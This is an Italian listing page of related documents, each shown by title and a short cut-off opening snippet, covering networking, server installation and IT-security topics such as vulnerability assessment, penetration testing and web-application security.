1 Gli aspetti di sicurezza nella gestione documentale Riccardo Baldini EMEA Oracle UCM Sales Consultant La tutela della sicurezza Perdita di informazioni Assicurazione della privacy
Dettagli2.5. L'indirizzo IP identifica il computer di origine, il numero di porta invece identifica il processo di origine.
ESERCIZIARIO Risposte ai quesiti: 2.1 Non sono necessarie modifiche. Il nuovo protocollo utilizzerà i servizi forniti da uno dei protocolli di livello trasporto. 2.2 Il server deve essere sempre in esecuzione
DettagliBozza Guida ufficiale vs 1.0
Bozza Guida ufficiale vs 1.0 Caratteristiche del software Videocopen è un software open source di videoconferenza. Sviluppato in php per la parte web e macromedia flash per la videoconferenza, sfrutta
DettagliSommario. Introduzione Architettura Client-Server. Server Web Browser Web. Architettura a Due Livelli Architettura a Tre Livelli
Sommario Introduzione Architettura Client-Server Architettura a Due Livelli Architettura a Tre Livelli Server Web Browser Web Introduzione La storia inizia nel 1989 Tim Berners-Lee al CERN, progetto WWW
DettagliSPECIFICA DI ASSESSMENT PER I SERVIZI BPOL E BPIOL
SPECIFICA DI ASSESSMENT PER I SERVIZI BPOL E BPIOL ver.: 1.0 del: 21/12/05 SA_Q1DBPSV01 Documento Confidenziale Pagina 1 di 8 Copia Archiviata Elettronicamente File: SA_DBP_05_vulnerability assessment_sv_20051221
DettagliInstallazione dell'adattatore di IBM SPSS Modeler Server
Installazione dell'adattatore di IBM SPSS Modeler Server Indice Installazione dell'adattatore per IBM SPSS Modeler Server......... 1 Informazioni sull'installazione dell'adattatore IBM SPSS Modeler Server...........
DettagliIntroduzione alle applicazioni di rete
Introduzione alle applicazioni di rete Definizioni base Modelli client-server e peer-to-peer Socket API Scelta del tipo di servizio Indirizzamento dei processi Identificazione di un servizio Concorrenza
DettagliTratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET)
Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Ipotesi di partenza: concetti di base del networking Le ipotesi di partenza indispensabili per poter parlare di tecniche di accesso
DettagliIndice. Indice V. Introduzione... XI
V Introduzione........................................................ XI PARTE I Installazione di Linux come Server.............................. 1 1 Riepilogo tecnico delle distribuzioni Linux e di Windows
DettagliConsiglio Nazionale delle Ricerche Area di Ricerca di Bologna Istituto per le Applicazioni Telematiche di Pisa bibliomime@cnr.it
Consiglio Nazionale delle Ricerche Area di Ricerca di Bologna Istituto per le Applicazioni Telematiche di Pisa bibliomime@cnr.it Francesco Gennai - IAT - Francesco.Gennai@iat.cnr.it 1 Il progetto Biblio
DettagliLegenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità.
Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Livello di Pericolosità 3: Login Cracking: Il cracking è il
DettagliAMBIENTE DI TEST LIKEWISE
AMBIENTE DI TEST LIKEWISE Milano Hacking Team S.r.l. Via della Moscova, 13 20121 MILANO (MI) - Italy http://www.hackingteam.it info@hackingteam.it Tel. +39.02.29060603 Fax +39.02.63118946 2005 Hacking
DettagliActive Directory. Installatore LAN. Progetto per le classi V del corso di Informatica
Installatore LAN Progetto per le classi V del corso di Informatica Active Directory 26/02/08 Installatore LAN - Prof.Marco Marchisotti 1 Agli albori delle reti...... nelle prime LAN era facile individuare
DettagliReti e Domini Windows 2000. Corso di Amministrazione di Reti A.A. 2002/2003
Reti e Domini Windows 2000 Corso di Amministrazione di Reti A.A. 2002/2003 Materiale preparato utilizzando dove possibile materiale AIPA http://www.aipa.it/attivita[2/formazione[6/corsi[2/materiali/reti%20di%20calcolatori/welcome.htm
DettagliProcedura di Aggiornamento TO.M.M.YS. SQL 2005 e 2008
Questa procedura illustra passo passo gli step da compiere per aggiornare il programma TO.M.M.YS. che è stato installato con il supporto di Microsoft SQL 2005. ATTENZIONE: La presente procedura DEVE essere
DettagliMonitorare la superficie di attacco. Dott. Antonio Capobianco (Founder and CEO Fata Informatica)
Monitorare la superficie di attacco Dott. Antonio Capobianco (Founder and CEO Fata Informatica) Vulnerabilità Difetto o debolezza che può essere sfruttata per violare la politica di sicurezza di un sistema(*)
DettagliLuca Mari, Sistemi informativi applicati (reti di calcolatori) appunti delle lezioni. Architetture client/server: applicazioni client
Versione 25.4.05 Sistemi informativi applicati (reti di calcolatori): appunti delle lezioni Architetture client/server: applicazioni client 1 Architetture client/server: un esempio World wide web è un
DettagliKLEIS WEB APPLICATION FIREWALL
KLEIS WEB APPLICATION FIREWALL VERSIONE 2.1 Presentazione www.kwaf.it Cos'è Kleis Web Application Firewall? Kleis Web Application Firewall (KWAF) è un firewall software per la difesa di: Web Application
DettagliApplicazioni software e gestione delle vulnerabilità: un caso concreto di successo
Applicazioni software e gestione delle vulnerabilità: un caso concreto di successo Roberto Obialero, GCFW, GCFA Fabio Bucciarelli, GCFA, CEH Agenda Analisi del contesto (attacchi,
DettagliLA TECNOLOGIA CONTRO L HACKING
LA TECNOLOGIA CONTRO L HACKING LUCA EMILI RODOLFO ROSINI GIORGIO VERDE E*MAZE Networks S.p.A. I punti che verranno trattati: La sicurezza di siti web, piattaforme di e-business e sistemi di pagamento on-line.
DettagliArchitettura MVC-2: i JavaBeans
Siti web centrati sui dati Architettura MVC-2: i JavaBeans Alberto Belussi anno accademico 2008/2009 Limiti dell approccio SEVLET UNICA La servlet svolge tre tipi di funzioni distinte: Interazione con
DettagliBOLLETTINO DI SICUREZZA INFORMATICA
STATO MAGGIORE DELLA DIFESA II Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa Sezione Gestione del Rischio CERT Difesa CC BOLLETTINO DI SICUREZZA INFORMATICA N. 5/2008 Il bollettino può essere
DettagliFate doppio click sul file con nome postgresql-8.0.msi e impostate le varie voci come riportato nelle immagini seguenti:
,QVWDOOD]LRQHGL'LVNL L installazione di Diski e composta di due parti: il back-end e il front-end. Il back-end e il database relazionale orientato agli oggetti PostgreSQL. PostgreSQL e disponibile in diverse
DettagliUniversità degli studi di Udine
Università degli studi di Udine Analisi di una rete basata su protocollo IPv6 Relatore: Gianluca Foresti Laureando: Matteo Temporini Controrelatore: Marino Miculan Obiettivo di questa tesi Stato dell'arte
DettagliConcetti base di sicurezza applicativa web. Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna
Concetti base di sicurezza applicativa web Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna Agenda Concetti base Esempio reale (SQL code injection) Come cambia lo scenario
DettagliINSTALLARE PALLADIO USB DATA CABLE IN WINDOWS XP/ME/2000/98
rev. 1.0-02/2002 Palladio USB Data Cable INSTALLARE PALLADIO USB DATA CABLE IN WINDOWS XP/ME/2000/98 (tutti i KIT, escluso KIT MOTOROLA V6x-T280) La procedura di installazione del Palladio USB Data Cable
DettagliModelli architetturali di infrastruttura. Diego Feruglio Direzione Progettazione Infrastrutture CSI-Piemonte
Modelli architetturali di infrastruttura Direzione Progettazione Infrastrutture CSI-Piemonte 0 Infrastruttura Definizione di Infrastruttura Nell ICT per infrastruttura si intende l insieme di componenti
Dettaglipenetration test (ipotesi di sviluppo)
penetration test (ipotesi di sviluppo) 1 Oggetto... 3 2 Premesse... 3 3 Attività svolte durante l analisi... 3 3.1 Ricerca delle vulnerabilità nei sistemi... 4 3.2 Ricerca delle vulnerabilità nelle applicazioni
DettagliReti di Telecomunicazione Lezione 7
Reti di Telecomunicazione Lezione 7 Marco Benini Corso di Laurea in Informatica marco.benini@uninsubria.it Il protocollo Programma della lezione file transfer protocol descrizione architetturale descrizione
DettagliSAMBA COS È? Samba è un software che fornisce servizi di condivisione utilizzando il protocollo SMB (Server Message Block). A differenza di altri programmi, Samba è gratuito e Open Source, e permette l
DettagliCORSO DI RETI SSIS. Lezione n.2. 2 Novembre 2005 Laura Ricci
CORSO DI RETI SSIS Lezione n.2. 2 Novembre 2005 Laura Ricci IL DOMAIN NAME SYSTEM (DNS) Indirizzi IP poco adatti per essere memorizzati da utenti umani è prevista la possibiltà di associare nomi simbolici
Dettagliappunti delle lezioni Architetture client/server: applicazioni client
Sistemi informativi applicati (reti di calcolatori): appunti delle lezioni Architetture client/server: applicazioni client 1 Architetture client/server: un esempio World wide web è un esempio particolarmente
DettagliReti di computer. L12 - Comunicazione e archiviazione digitale A.A 2015-2016. Sommario
Reti di computer L12 - Comunicazione e archiviazione digitale A.A 2015-2016 Carlo Savoretti carlo.savoretti@unimc.it Sommario Protocolli di rete Internet Protocol Indirizzi IP Principali apparati di rete
DettagliBiotrends - Istruzioni per il Setup
Biotrends - Istruzioni per il Setup Procedura Operativa Standard Autore Data Firma Francesco Izzo 22.08.2009 Approvato da Data Firma Mauro Pedrazzoli Storia delle edizioni Ed Descrizione Autore Dipartimento/Servizio
DettagliIl Web Server e il protocollo HTTP
Corso PHP Parte 2 Il Web Server e il protocollo HTTP E un programma sempre attivo che ascolta su una porta le richieste HTTP. All arrivo di una richiesta la esegue e restituisce il risultato al browser,
DettagliMONITORAGGIO UNITARIO PROGETTI 2007/2013 PROTOCOLLO DI COLLOQUI ANALISI ATTIVAZIONE SERVIZIO IGRUE IN SPCOOP. Link.it srl - Analisi Servizio IGRUE 1
MONITORAGGIO UNITARIO PROGETTI 2007/2013 PROTOCOLLO DI COLLOQUI ANALISI ATTIVAZIONE SERVIZIO IGRUE IN SPCOOP Link.it srl - Analisi Servizio IGRUE 1 Panoramica L'attuale sistema IGRUE è composto da: Il
DettagliPosta elettronica per gli studenti Email for the students
http://www.uninettunouniverstiy.net Posta elettronica per gli studenti Email for the students Ver. 1.0 Ultimo aggiornamento (last update): 10/09/2008 13.47 Informazioni sul Documento / Information on the
DettagliCOME CREARE E COLLEGARSI AD UN DATABASE MICROSOFT SQL SERVER O SUN MYSQL
Codice documento 08052301 Data creazione 23/05/2008 Ultima revisione 06/06/2013 Software DOCUMATIC Versione 7 COME CREARE E COLLEGARSI AD UN DATABASE MICROSOFT SQL SERVER O SUN MYSQL Questo documento spiega
DettagliAgent, porte, connettività e reti... 3. L agent di Kaseya utilizza la porta 5721 per comunicare con il server, ma che tipo di porta è?...
Kaseya Domande e Risposte Agent, porte, connettività e reti... 3 L agent di Kaseya utilizza la porta 5721 per comunicare con il server, ma che tipo di porta è?...3 Quanta memoria occupa l agent di Kaseya?...3
DettagliModulo 1.3 Reti e servizi
Modulo 1.3 Reti e servizi 1. Introduzione al Networking Connettere il PC in rete; schede di rete e modem; Panoramica sulle reti ad alta velocita' e reti dial-up; Testare la connettivita' con ping; Introduzione
Dettagli